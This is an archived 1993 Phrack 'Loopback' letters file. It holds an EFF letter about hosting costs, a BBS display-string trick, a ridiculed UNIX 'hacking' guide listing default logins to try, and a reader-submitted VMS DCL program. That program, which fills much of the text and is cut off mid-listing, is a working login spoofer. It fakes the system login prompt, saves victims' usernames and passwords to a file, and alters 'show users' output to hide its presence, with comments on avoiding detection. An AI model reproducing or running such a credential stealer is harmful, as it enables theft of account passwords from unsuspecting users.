💾 Archived View for aphrack.org › issues › phrack43 › 2.gmi captured on 2021-12-17 at 13:26:06. Gemini links have been rewritten to link to archived content
View Raw
More Information
⬅️ Previous capture (2021-12-03)
-=-=-=-=-=-=-
==Phrack Magazine==
Volume Four, Issue Forty-Three, File 2 of 27
Phrack Loopback
Part I
- ***************************************************************************
COMING NEXT ISSUE
Van Eck Info (Theory & Practice)
More Cellular (Monitoring Reverse Channel, Broadcasting, Reprogramming)
HUGE University Dialup List (Mail Us YOUR School's Dialup NOW!)
Neato Plans For Evil Devices
Gail Thackeray Gifs
- ********************************** M A I L *********************************
Chris,
Craig Neidorf gave me these addresses as ways to reach you. He tells me
that you are currently editing Phrack. I hope you are well.
Recently the EFF sysadmins, Chris Davis and Helen Rose, informed me that
eff.org was using so much of its T-1 bandwidth that UUNET, who supplies our
IUP connection, was charging us an extra $1,000 per month. They did some
investigation at my request. We determined that Phrack traffic alone was
responsible for over 40% of the total bytes transferred from the site over
the past year or so. This is several gigabytes per month. All in all, the
CuD archive, which contains Phrack, CuD, and other publications accounts
for 85% of our total traffic. All of the email to and from EFF, Usenet
traffic, and other FTP (from the EFF archive, the CAF archive, and others)
constitutes about 15%.
EFF isn't going to be able to carry it any more because it is effectively
costing us $1,000 per month. The fundamental problem is that Phrack is so
popular (at least as a free good) to cause real expense in transmission
costs. Ultimately the users are going to have to pay the costs because
bandwidth (when measures in gigabytes anyway) isn't free. The 12K per
year it costs us to carry Phrack is not something which EFF can justify in
its budget. I'm sure you can understand this.
On July 1, eff.org moves from Cambridge to Washington, DC which is when I
expect we will stop carrying it. I wanted to raise this issue now to let
you know in advance of this happening.
I have also asked Chris and Helen to talk to Brendan Kehoe, who actually
maintains the archive, to see whether there is anything we can do to help
find another site for Phrack or make any other arrangement which will
result in less loss of service.
Mitch
------------------------------------------------------------------------------
Mitchell Kapor, Electronic Frontier Foundation
Note permanent new email address for all correspondence as of 6/1/93
mkapor@kei.com
[Editor: Well, all things must come to an end. Looks like EFF's
move to Washington is leaving behind lots of bad
memories, and looking forward to a happy life in the hotbed
of American politics. We wish them good luck. We also
encourage everyone to join.........CPSR.
In all fairness, I did ask Mitch more detail about the
specifics of the cost, and he explained that EFF was paying
flat rate for a fractional T-1, and whenever they went over
their allotted bandwidth, they were billed above and beyond
the flat rate. Oh well. Thank GOD for Len Rose.
Phrack now has a new home at ftp.netsys.com.]
- ***************************************************************************
I'm having a really hard time finding a lead to the Information
America Network. I am writing you guys as a last resort. Could
you point me in the right direction? Maybe an access number or
something? Thanks you very much.
[Editor: You can reach Information America voice at 404-892-1800.
They will be more than happy to send you loads of info.]
- ***************************************************************************
To whom it may concern:
This is a submission to the next issue of phrack...thanks for the great
'zine!
----------------------------cut here-------------------------------
Greetings Furds:
Have you ever wanted to impress one of those BBS-babes with your astounding
knowledge of board tricks? Well *NOW* you can! Be the life of the party!
Gain and influence friends! Irritate SysOps! Attain the worship and
admiration of your online pals. Searchlight BBS systems (like many other
software packages) have internal strings to display user information in
messages/posts and the like. They are as follows (tested on Searchlight BBS
System v2.25D):
\%A = displays user's access level
\%B = displays baud rate connected at
\%C = unknown
\%F = unknown
\%G = displays graphics status
\%K = displays user's first name
\%L = displays system time
\%M = displays user's time left on system
\%N = displays user's name in format: First Last
\%O = times left to call "today"
\%P = unknown
\%S = displays line/node number and BBS name
\%T = displays user's time limit
\%U = displays user's name in format: FIRST_LAST
All you gotta do is slam the string somewhere in the middle of a post or
something and the value will be inserted for the reader to see.
Example: Hey there chump, I mean \%K, you better you better UL or log
off of \%S...you leach too damn many files..you got \%M mins
left to upload some new porn GIFs or face bodily harm and
mutilation!.
----------------------------
Have phun!
Inf0rmati0n Surfer (& Dr. Cloakenstein)
SysOp Cranial Manifestations vBBS
[Editor: Ya know, once a LONG LONG time ago, I got on a BBS and
while reading messages noticed that a large amount of
messages seemed to be directed at ME!!# It took me
about 10 minutes to figure it out, but BOY WAS I MAD!
Then I added my own \%U message for the next hapless fool.
:) BIG FUN!]
- ***************************************************************************
-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-
SotMESC
The US SotMESC Chapter is offering
Scholarships for the 1993 school term.
Entries should be single-spaced paragraphs,
Double-spacing between paragraphs.
The subject should center on an aspect of the
Computer Culture and be between 20-30 pages long.
Send entries to:
SotMESC
PO Box 573
Long Beach, MS 39560
All entries submitted will become the property of the SotMESC
-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-
- ***************************************************************************
The Southwest Netrunner's League's
-----------------------------------------------------------------
WareZ RoDeNtZ Guide to UNIX!!!!
-----------------------------------------------------------------
Compiled by:The Technomancer (UNICOS,UNIX,VMS,and Amigas)
Assists by:SysCon XIV (The Ma'Bell Rapist)
Iron Man MK 4a (Things that make ya go boom)
This file begs to be folded, spindeled,and mutilated.
No Rights Reserved@1993
-----------------------------------------------------------------
Technomancer can be reached at: af604@FreeNet.hsc.colorado.edu
Coming this September.... Shadowland, 68020... Watch this space.
-----------------------------------------------------------------
Part I(Basic commands)
Phile Commands: ls=List Philes
more,page=Display Phile on Yo Terminal
cp=Copy Phile
mv=Move or Remove Philes
rm=Remove Philes
Editor Commnds: vi=Screen Editor
Dirtory cmmnds: dir=Prints Directory
mkdir=Makes a new Directory(also a VERY bad bug)
rmdir=Remove a Directory
pwd=print working directory
Misc. Commands: apropos=Locate commands by keyword lookup.
whatis=Display command description.
man=Displays manual pages online.
cal=Prints calendar
date=Prints the time and date.
who=Prints out every one who is logged in
(Well, almost everyone 7:^] )
---------------------------------------------------------------
Part II(Security(UNIX security, another OXYMORON 7:^] ))
If you are a useless wAReZ r0dEnT who wants to try to Netrun
a UNIX system, try these logins....
root
unmountsys
setup
makefsys
sysadm
powerdown
mountfsys
checkfsys
All I can help ya with on da passwords iz ta give you some
simple guidelines on how they are put together....
6-8 characters
6-8 characters
1 character is a special character (exmpl:# ! ' & *)
-----------------------------------------------------------------
Well thats all fo' now tune in next time, same Hack-time
same Hack-channel!!!
THE TECHNOMANCER I have taken all knowledge
af604@FreeNet.hsc.colorado.edu
to be my province
--
Technomancer
Southwest Netrunner's League
- ****************************************************************
[Editor: This is an example of what NOT to send to Phrack.
This is probably the worst piece of garbage I've
received, so I had to print it. I can only hope
that it's a private joke that I just don't get.
Uh, please don't try to write something worse and
submit it hoping to have it singled out as the
next "worst," since I'll just ignore it.]
- ***************************************************************************
Dear Phrack,
I was looking through Phrack 42 and noticed the letters about password
stealers. It just so happened that the same day I had gotten extremely
busted for a program which was infinitely more indetectible. Such is life.
I got off pretty well being an innocent looking female so it's no biggie.
Anyway, I deleted the program the same day because all I could think was
"Shit, I'm fucked". I rewrote a new and improved version, and decided to
submit it. The basic advantages of this decoy are that a) there is no
login failure before the user enters his or her account, and b) the
program defines the show users command for the user so that when they
do show users, the fact that they are running out of another account
doesn't register on their screen.
There are a couple holes in this program that you should probably be
aware of. Neither of these can kick the user back into the account that
the program is running from, so that's no problem, but the program can
still be detected. (So basically, don't run it out of your own account...
except for maybe once...to get a new account to run it out of) First, once
the user has logged into their account (out of your program of course) hitting
control_y twice in a row will cause the terminal to inquire if they are
doing this to terminate the session on the remote node. Oops. It's really no
problem though, because most users wouldn't even know what this meant. The
other problem is that, if the user for some strange reason redefines show:
$show == ""
then the show users screen will no longer eliminate the fact that the account
is set host out of another. That's not a big deal either, however, because
not many people would sit around randomly deciding to redefine show.
The reason I was caught was that I (not even knowing the word "hacker"
until about a month ago) was dumb enough to let all my friends know about the
program and how it worked. The word got spread to redefine show, and that's
what happened. The decoy was caught and traced to me. Enough BS...here's the
program. Sorry...no UNIX...just VMS.
Lady Shade
I wrote the code...but I got so many ideas from my buddies:
Digital Sorcerer, Y.K.F.W., Techno-Pirate, Ephemereal Presence, and Black Ice
------------------------------------------------
$if p1 .eqs. "SHOW" then goto show
$sfile = ""
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! The role of the dummy file in this program is to tell if the program !!!!
!!!! is being used as a decoy or as a substitute login for the victim. It !!!!
!!!! does not stay in your directory after program termination. !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$sfile = f$search("sys$system:[ZJABAD_X]dummy.txt")
$if sfile .nes. "" then goto other
$open/write io user.dat
$close io
$open/write dummy instaar_device:[miller_g]dummy.txt
$close dummy
$wo == "write sys$output"
$line = ""
$user = ""
$pass = ""
$a$ = ""
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! A login screen with a message informing someone of new mail wouldnt !!!!
!!!! be too cool... !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$set broadcast=nomail
$set message/noidenficitaion/noseverity/nofacility/notext
$on error then goto outer
$!on control_y then goto inner
$wo " [H [2J"
$wo ""
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! insert a fake logout screen here !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$wo " ZJABAD_X logged out at ", f$time()
$wo " [2A"
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! This is the main body of the program. It simulates the system login !!!!
!!!! screen. It also grabs the username and password and sticks them in !!!!
!!!! a file called user.dat !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$outer:
$set term/noecho
$inquire a$/nopun ""
$inquire a$/nopun ""
$set term/echo
$c = 0
$c1 = 0
$c2 = 0
$inner:
$c2 = c2 + 1
$if c2 .eqs. 5 then goto speedup
$c = c + 1
$if c .eqs. 15 then goto fail
$if c1 .eqs. 3 then goto fail3
$user = "a"
$wo "Username: "
$from_speedup:
$set term/uppercase
$wo " [2A"
$read/time_out=10/prompt=" [9C " sys$command user
$if user .eqs. "a" then goto timeout
$set term/nouppercase
$if user .eqs. "" then goto inner
$set term/noecho
$inquire pass "Password"
$set term/echo
$if user .eqs. "ME" then goto done
$if pass .eqs. "" then goto fail
$open/append io user.dat
$write io user + " " + pass
$close io
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! Sends the user into their account !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$open/write io set.com
$write io "$set host 0"
$write io user + "/COMMAND=INSTAAR_DEVICE:[MILLER_G]FINDNEXT"
$write io pass
$close io
$@set
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! Control has been returned to your account !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$write io " [2A"
$goto outer
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! Simulates a failure if the password is null, and also if the !!!!
!!!! username prompt has cycled through 15 times... This is what !!!!
!!!! the system login screen does. !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$fail:
$c = 1
$c1 = c1 + 1
$wo "User authorization failure"
$wo " [1A"
$goto inner
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! After the third failure, the system usually sends the screen back !!!!
!!!! one step...this just handles that. !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$fail3:
$wo " [2A"
$goto outer
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! The system keeps a timeout check in the login. If a username is not !!!!
!!!! entered quickly enough, the timeout message is activated !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$timeout:
$set term/nouppercase
$wo "Error reading command input"
$wo "Timeout period expired"
$wo " [2A"
$goto outer
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! There is a feature in this program which sets the terminal to !!!!
!!!! uppercase for the input of a username. This is wonderful for !!!!
!!!! preventing program detection, but it does cause a problem. It slows !!!!
!!!! the screen down, which looks suspicious. So, in the case where a !!!!
!!!! user walks up tot he terminal and holds the return key down for a !!!!
!!!! bit before typing in their username, this section speeds up the run !!!!
!!!! considerably. !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$speedup:
$set term/nouppercase
$fast_loop:
$user = "a"
$read/time_out=1/prompt="Username: " sys$command io
$if user .eqs. "a" then goto from_speedup
$goto fast_loop
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! This section is optional. There are many ways that you can implement !!!!
!!!! to break out of the program when you think you have gotten enough !!!!
!!!! passwords. 1), you can sit down at the terminal and type in a string !!!!
!!!! for the username and pass which kicks you out. If this option is !!!!
!!!! implemented, you should at least put in something that looks like !!!!
!!!! you have just logged in, the program should not kick straight back !!!!
!!!! to your command level, but rather execute your login.com. 2) You !!!!
!!!! can log in to the account which is stealing the password from a !!!!
!!!! different terminal and stop the process on the account which is !!!!
!!!! running the program. This is much safer, and my recommandation. !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$done:
$set broadcast=mail
$set message/facility/text/identification/severity
$delete dummy.txt;*
$exit
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! This section is how one covers up the fact that the account which has !!!!
!!!! been stolen is running out of another. Basically, the area of the show!!!!
!!!! users screen which registers this is at the far right hand side. !!!!
!!!! This section first writes the show users data to a file and alters !!!!
!!!! it before it is written to the screen for viewing by the user. There !!!!
!!!! may exist many forms of the show users command in your system, and !!!!
!!!! you may have to handle each one differently. I have written only two !!!!
!!!! manipulations into this code to be used as an example. But looking !!!!
!!!! at how this is preformed should be enough to allow you to write your !!!!
!!!! own special cases. Notice that what happens to activate this section !!!!
!!!! of the program is the computer detects the word "show" and interprets !!!!
!!!! it as a procedure call. The words following show become variables !!!!
!!!! passed into the program as p1, p2, etc. in the order which they !!!!
!!!! were typed after the word show. Also, by incorporating a third data !!!!
!!!! file into the manipulations, one can extract the terminal id for the !!!!
!!!! account which the program is running out of and plug this into the !!!!
!!!! place where the user's line displays his or her terminal id. Doing !!!!
!!!! this is better that putting in a fake terminal id, but that is just a !!!!
!!!! minor detail. !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$show:
$show = ""
$show$ = ""
$length = 0
$ch = ""
$full = 0
$c = 0
$if (f$extract(5,1,p2) .eqs. "/") .and. (f$extract(6,4,p2) .nes. "FULL") then show 'p1'
$if (p2 .eqs. "USERS/FULL") .and. (p3 .eqs. "") then goto ufull
$if p2 .eqs. "USERS" .and. p3 .eqs. "" then show users
$if p2 .eqs. "USERS" .and. p3 .eqs. "" then exit
$if p3 .eqs. "" then goto fallout
$goto full
$fallout:
$show 'p2' 'p3'
$exit
$ufull:
$show users/full/output=users.dat
$goto manipulate
$full:
$show$ = p3 + "/output=users.dat"
$show users 'show